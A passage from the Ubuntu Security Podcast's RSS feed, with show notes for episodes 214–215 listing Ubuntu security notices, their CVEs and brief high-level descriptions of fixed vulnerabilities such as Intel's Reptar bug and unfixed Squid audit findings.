<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6532-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6532-1">USN-6532-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45862">CVE-2023-45862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6533-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6533-1">USN-6533-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46862">CVE-2023-46862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46813">CVE-2023-46813</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6534-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6534-1">USN-6534-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6039">CVE-2023-6039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5158">CVE-2023-5158</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39198">CVE-2023-39198</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3773">CVE-2023-3773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-37453">CVE-2023-37453</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-discusses-the-openssf-s-compiler-options-hardening-guide-for-c-c-plus-plus-with-mark-esler--08-38">Alex discusses the OpenSSF&rsquo;s Compiler Options Hardening Guide for C/C++ with Mark Esler (08:38)</h3>
<ul>
<li><a href="https://openssf.org/blog/2023/11/29/strengthening-the-fort-openssf-releases-compiler-options-hardening-guide-for-c-and-c/">https://openssf.org/blog/2023/11/29/strengthening-the-fort-openssf-releases-compiler-options-hardening-guide-for-c-and-c/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E215.mp3" length="31527781" type="audio/mpeg" /><itunes:duration>1846</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 214
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-214/</link>
          <pubDate>Fri, 01 Dec 2023 18:51:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>4effd15d4f90a51a11e55adf3479ed0254faa0066589b98d1a42231979809ed9430f94b200b3a7a27e75a175ce6f7874186b35ab0c89097d4534029ca131ea3c</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 214</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a deep dive into the Reptar vuln in Intel processors plus we
  look into some relic vulnerabilities in Squid and OpenZFS and finally we detail
  new hardening measures in tracker-miners to keep your desktop safer.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a deep dive into the Reptar vuln in Intel processors plus we
  look into some relic vulnerabilities in Squid and OpenZFS and finally we detail
  new hardening measures in tracker-miners to keep your desktop safer.
  </itunes:summary>
        <description>  This week we take a deep dive into the Reptar vuln in Intel processors plus we
  look into some relic vulnerabilities in Squid and OpenZFS and finally we detail
  new hardening measures in tracker-miners to keep your desktop safer.
  </description>
        <googleplay:description>  This week we take a deep dive into the Reptar vuln in Intel processors plus we
  look into some relic vulnerabilities in Squid and OpenZFS and finally we detail
  new hardening measures in tracker-miners to keep your desktop safer.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a deep dive into the Reptar vuln in Intel processors plus we
look into some relic vulnerabilities in Squid and OpenZFS and finally we detail
new hardening measures in tracker-miners to keep your desktop safer.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>115 unique CVEs addressed</p>
<h3 id="usn-6481-1-frr-vulnerabilities--01-21">[<a href="https://ubuntu.com/security/notices/USN-6481-1">USN-6481-1</a>] FRR vulnerabilities (01:21)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46753">CVE-2023-46753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46752">CVE-2023-46752</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two different crashes reported by network pentester from Amazon - appears to
be fuzzing frr -&gt; DoS</li>
</ul>
<h3 id="usn-6482-1-quagga-vulnerabilities--01-42">[<a href="https://ubuntu.com/security/notices/USN-6482-1">USN-6482-1</a>] Quagga vulnerabilities (01:42)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46753">CVE-2023-46753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37032">CVE-2022-37032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Speaking of BGP daemons - Quagga was the precursor to FRR - also suffers from
one of these CVEs, plus and older one that was previously fixed in FRR
(<a href="/episode-181/#usn-5685-1-frr-vulnerabilities">[USN-5685-1] FRR vulnerabilities from Episode 181</a>) that
would lead to an OOB read</li>
</ul>
<h3 id="usn-6483-1-html-tidy-vulnerability--02-05">[<a href="https://ubuntu.com/security/notices/USN-6483-1">USN-6483-1</a>] HTML Tidy vulnerability (02:05)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33391">CVE-2021-33391</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Implemented parser as a recursive algorithm - so on deeply nested documents,
could end up exhausting the stack and causing memory corruption etc.</li>
<li>Fixed by reimplementing the parser as an iterative loop with a heap-based
stack</li>
</ul>
<h3 id="usn-6480-1-dot-net-vulnerabilities--02-42">[<a href="https://ubuntu.com/security/notices/USN-6480-1">USN-6480-1</a>] .NET vulnerabilities (02:42)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36049">CVE-2023-36049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-36558">CVE-2023-36558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6484-1-openvpn-vulnerabilities--02-51">[<a href="https://ubuntu.com/security/notices/USN-6484-1">USN-6484-1</a>] OpenVPN vulnerabilities (02:51)</h3>
<ul>
<li>2 CVEs addressed in Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46850">CVE-2023-46850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46849">CVE-2023-46849</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two issues which only affected more recent versions of OpenVPN (&gt;= =2.6.0) -
one UAF and the other a possible divide by zero -&gt; DoS</li>
</ul>
<h3 id="usn-6485-1-intel-microcode-vulnerability--03-13">[<a href="https://ubuntu.com/security/notices/USN-6485-1">USN-6485-1</a>] Intel Microcode vulnerability (03:13)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23583">CVE-2023-23583</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Tavis Ormandy&rsquo;s latest processor bug - &ldquo;<a href="https://lock.cmpxchg8b.com/reptar.html">Reptar</a>&rdquo; - found again using the same
technique as he used to find Zenbleed (AMD) but this time in Intel
processors - essentially can be thought of as akin to fuzzing but instead of
generating random input to find unexpected behaviour, generate some random
input in the form of a set of processor instructions, and then also generate
an equivalent version of this by adding random alignment, serialization and
memory fence instructions etc. These extra instructions shouldn&rsquo;t change the
behaviour of the program being executed, so if a difference is observed then
can likely assume the hardware has behaved incorrectly - perhaps some
underlying microarchitectural behaviour has been triggered - but either way
could indicate the presence of a hardware bug which could in turn be exploited
as a vulnerability to cause undesired affects</li>
<li>In this case, found a sequence of instructions that in general should be
ignored but which could instead cause the processor to hit a machine check
exception and halt - even from an unprivileged guest VM - this is the kind of
things that cloud providers worry about</li>
<li>Theorised that since they can cause MCEs by corrupting various internal state
of the processor, they could potentially get privilege escalation if they
could control that corruption with enough precision but since it is not really
possible to debug the microarchitectural state of the processor it is not easy
to develop such a PoC</li>
<li>Reported the issue to Intel who released a microcode update to fix this, and
Tavis released a PoC tool to test for and reproduce the basic issue</li>
</ul>
<h3 id="usn-6486-1-iniparser-vulnerability--06-25">[<a href="https://ubuntu.com/security/notices/USN-6486-1">USN-6486-1</a>] iniParser vulnerability (06:25)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33461">CVE-2023-33461</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible NULL ptr deref on crafted input</li>
</ul>
<h3 id="usn-6487-1-avahi-vulnerabilities--06-36">[<a href="https://ubuntu.com/security/notices/USN-6487-1">USN-6487-1</a>] Avahi vulnerabilities (06:36)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38473">CVE-2023-38473</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38472">CVE-2023-38472</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38471">CVE-2023-38471</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38470">CVE-2023-38470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38469">CVE-2023-38469</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various assertions were able to be triggered through crafted input - so a
local attacker on your network could cause your local avahi daemon to crash</li>
</ul>
<h3 id="usn-6489-1-tang-vulnerability--07-09">[<a href="https://ubuntu.com/security/notices/USN-6489-1">USN-6489-1</a>] Tang vulnerability (07:09)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1672">CVE-2023-1672</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Race condition when generating keys - would write to a file and then set
permissions so only root could read them - small time window then where
another process could possibly read the key before the more restrictive
permissions are set - fixed by setting a restrictive umask before creating the
file such that it gets created with the restrictive permissions from the start</li>
</ul>
<h3 id="usn-6488-1-strongswan-vulnerability--07-59">[<a href="https://ubuntu.com/security/notices/USN-6488-1">USN-6488-1</a>] strongSwan vulnerability (07:59)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41913">CVE-2023-41913</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6490-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6490-1">USN-6490-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42852">CVE-2023-42852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-41983">CVE-2023-41983</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6491-1-node-dot-js-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6491-1">USN-6491-1</a>] Node.js vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43548">CVE-2022-43548</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-35256">CVE-2022-35256</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32215">CVE-2022-32215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32214">CVE-2022-32214</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32213">CVE-2022-32213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32212">CVE-2022-32212</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6493-1-usn-6493-2-hibagent-update">[<a href="https://ubuntu.com/security/notices/USN-6493-1">USN-6493-1</a>, <a href="https://ubuntu.com/security/notices/USN-6493-2">USN-6493-2</a>] hibagent update</h3>
<ul>
<li>Affecting Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)</li>
</ul>
<h3 id="usn-6492-1-mosquitto-vulnerabilities--08-06">[<a href="https://ubuntu.com/security/notices/USN-6492-1">USN-6492-1</a>] Mosquitto vulnerabilities (08:06)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28366">CVE-2023-28366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3592">CVE-2023-3592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0809">CVE-2023-0809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41039">CVE-2021-41039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34434">CVE-2021-34434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34431">CVE-2021-34431</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Multiple memory leaks which can be triggered through crafted packets -&gt; DoS</li>
<li>Excessive CPU usage when parsing a connect request from a client with a large number of user-properties -&gt; DoS</li>
<li>Logic bug - failed to revoke existing subscriptions when a topic subscription
is revoked in some cases - would still get notified after the fact - info / privacy leak</li>
</ul>
<h3 id="usn-6498-1-frr-vulnerabilities--08-55">[<a href="https://ubuntu.com/security/notices/USN-6498-1">USN-6498-1</a>] FRR vulnerabilities (08:55)</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-47235">CVE-2023-47235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47234">CVE-2023-47234</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38407">CVE-2023-38407</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38406">CVE-2023-38406</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More issues discovered by Iggy Frankovic at Amazon - seemingly through fuzzing
of frr - UAF, OOB read etc.</li>
</ul>
<h3 id="usn-6499-1-gnutls-vulnerability--09-13">[<a href="https://ubuntu.com/security/notices/USN-6499-1">USN-6499-1</a>] GnuTLS vulnerability (09:13)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5981">CVE-2023-5981</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Timing side-channel during RSA-PSK ClientKeyExchange - response time would
vary if given malformed ciphertext compared to when using correct PKCS#1 v1.5
padding - very similar to historical CVE-2023-0361 (<a href="/episode-189/#usn-5901-1-gnutls-vulnerability">[USN-5901-1] GnuTLS
vulnerability from Episode 189</a>) - in that case the same issue was fixed for
regular RSA - but no-one noticed that the same problematic code existed for
this other case as well</li>
<li>Old adage - if you want to find a vuln, look near other previous vulns - and
by the same token, if a project has a vuln reported, go looking to see if
perhaps there are other instances of the same vuln in the code base</li>
<li>Lots of projects have lots of copy-pasted or duplicated code within themselves</li>
</ul>
<h3 id="usn-6500-1-squid-vulnerabilities--10-20">[<a href="https://ubuntu.com/security/notices/USN-6500-1">USN-6500-1</a>] Squid vulnerabilities (10:20)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46848">CVE-2023-46848</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46847">CVE-2023-46847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46846">CVE-2023-46846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46728">CVE-2023-46728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46724">CVE-2023-46724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Back in early 2021 a security audit was performed on Squid which found 55
vulnerabilities - these were reported to the upstream project and some CVEs
were assigned but a lot went without any fix</li>
<li>Unfortunately the Squid project is understaffed and hasn&rsquo;t had the resources to fix all the issues</li>
<li>Researchers eventually got tired of waiting (approx 900 days so not
surprising) - so released details publicly of all their findings</li>
<li><a href="https://megamansec.github.io/Squid-Security-Audit/">https://megamansec.github.io/Squid-Security-Audit/</a></li>
<li>A mix of CVEs and GHSAs have been assigned for some, but not all issues, so
some are still unfixed</li>
<li>This update contains fixes for all the CVEs which have been assigned so far -
expect more updates in the future</li>
</ul>
<h3 id="usn-6494-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6494-1">USN-6494-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45862">CVE-2023-45862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42754">CVE-2023-42754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39194">CVE-2023-39194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39193">CVE-2023-39193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39192">CVE-2023-39192</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39189">CVE-2023-39189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6495-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6495-1">USN-6495-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6496-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6496-1">USN-6496-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6497-1-linux-kernel--oem--vulnerabilities--11-50">[<a href="https://ubuntu.com/security/notices/USN-6497-1">USN-6497-1</a>] Linux kernel (OEM) vulnerabilities (11:50)</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5717">CVE-2023-5717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5178">CVE-2023-5178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Logic issue in handling of x2AVIC MSR in KVM nested virtualisation on AMD
processors - could allow an attacker in a guest VM to cause a crash on the
host kernel and hence a DoS against the whole host</li>
</ul>
<h3 id="usn-6502-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6502-1">USN-6502-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in the error handling code for SMB file system - local attacker could use
this to escalate privileges</li>
</ul>
<h3 id="usn-6502-2-linux-kernel--oracle--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6502-2">USN-6502-2</a>] Linux kernel (Oracle) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6502-3-linux-kernel--nvidia--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6502-3">USN-6502-3</a>] Linux kernel (NVIDIA) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6503-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6503-1">USN-6503-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5633">CVE-2023-5633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4244">CVE-2023-4244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6516-1-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6516-1">USN-6516-1</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3772">CVE-2023-3772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31085">CVE-2023-31085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31083">CVE-2023-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25775">CVE-2023-25775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6520-1-linux-kernel--starfive--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6520-1">USN-6520-1</a>] Linux kernel (StarFive) vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5090">CVE-2023-5090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45871">CVE-2023-45871</a> <!-- raw HTML omitted --></li>
